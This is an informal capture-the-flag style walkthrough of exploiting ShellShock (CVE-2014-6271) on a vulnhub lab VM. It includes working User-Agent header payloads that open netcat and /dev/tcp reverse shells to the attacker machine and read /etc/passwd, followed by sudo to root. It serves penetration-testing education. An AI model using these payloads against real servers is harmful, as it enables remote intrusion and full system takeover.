CVE 2014-6271 aka ShellShock
VM provided by pentestlab its sort of POC for ShellShock vulnerability, unlike other boot2root challenges it does contain any flags but yes ultimate goal is to get root by exploiting ShellShock. its tiny iso of couple megs. you can grab it at vulnhub.
prerequisites -> you need hypervisor (I am using virtual-box), its live-CD so boot directly and auto assign IP from DHCP , make sure you configured networking already.
(Note: boot2root VM’s are meant to used in private non-routable IP range , do not boot it in production environment not even internet facing ip ip range unless you have really good reason to do so!)
CVE 2014-6271 is bash vulnerability which affects bash version 4.3
it allows attacker to run arbitrary bash commands.bash is not directly available for web-apps but can be exposed indirectly via CGI (common-gateway interface). CGI uses bash commands in background and it store data in environment variables,these environment variables turned out nothing but bash variable and anything inside can interact with bash directly. with ShellShock one can alter the environment variables even run arbitrary bash commands crafted inside HTTP headers. most common HTTP headers – User-Agent,Host,Referrer.
Lets get started—>
I am on 192.168.1.0/24 network, CVE.iso machine booted and auto-assigned IP 192.168.1.2(may vary with your n/w)
192.168.1.2 (referred as victim throughout)
192.168.1.1(Attacker)
first thing to conform machine ip (even i know it just for completions sake)
netdiscover -i eth0
NMAP probing–>
nmap -Pn -n 192.168.1.2
Detailed NMAP scan –>
nmap -Pn -n -A 192.168.1.2
from nmap results , we know that only 2 services are up SSH and HTTP.
lets explore web interface
Its plain looking page but one interesting thing it display bash output of uptime command, interesting,
lets take a look at page-source.
from source we are 100% sure web-app running on CGI and using script which call uptime bash command with help of environment varibles in CGI.The only way to find out now is to run interceptor-proxy our best bet is burpsuit so we can check behaviour of website in deep.
if you are on kali burpsuit already installed if not grab it from here.
fire burp-suite
setup browser proxy setting according to burp so requests can be intercepted.
As stated earlier, we need to alter headers to check if server is vulnerable to shellshock or not.
lets , alter User-Agent string (via repeater in burpsuit)
GET /cgi-bin/status HTTP/1.0
user-agent: () { :; }; /bin/bash -c 'ping -c 3 172.16.246.129'
lets chain commands, get bash reverse shell.
start nc listener on 7337 port(on attackers end)
In burp try another user-agent crafted with bash reverse shell….
GET /cgi-bin/status HTTP/1.0
user-agent: () { :; }; /bin/bash -c 'nc 192.168.1.1 31337 -e /bin/sh'
GOT SHELL…
with sudo -s its game over , got root ! there is another way doing it without using burp just sending headers with old friend echo right from bash.
running arbitrary commands reading /etc/passwd.
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: 192.168.1.2\connection: close\r\n\r\n" | nc 192.168.1.2 80
Reverse-Bashshell–>
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { ;};/bin/bash -i >& /dev/tcp/192.168.1.1/7337 0>&1\r\nHost: 192.168.1.2\nConnection: clo\r\n\r\n" | nc 192.168.1.2 80
got neat shell at nc listener which was already running in background.
Final thoughts, Shellshock is sort of fun vulnerability but have critical impact and it can go easily undetected so better we keep bash updated , block malicious traffic at IPS level
kudos to pentestlab & vulnhub providing good exercise.
Linux g33ks 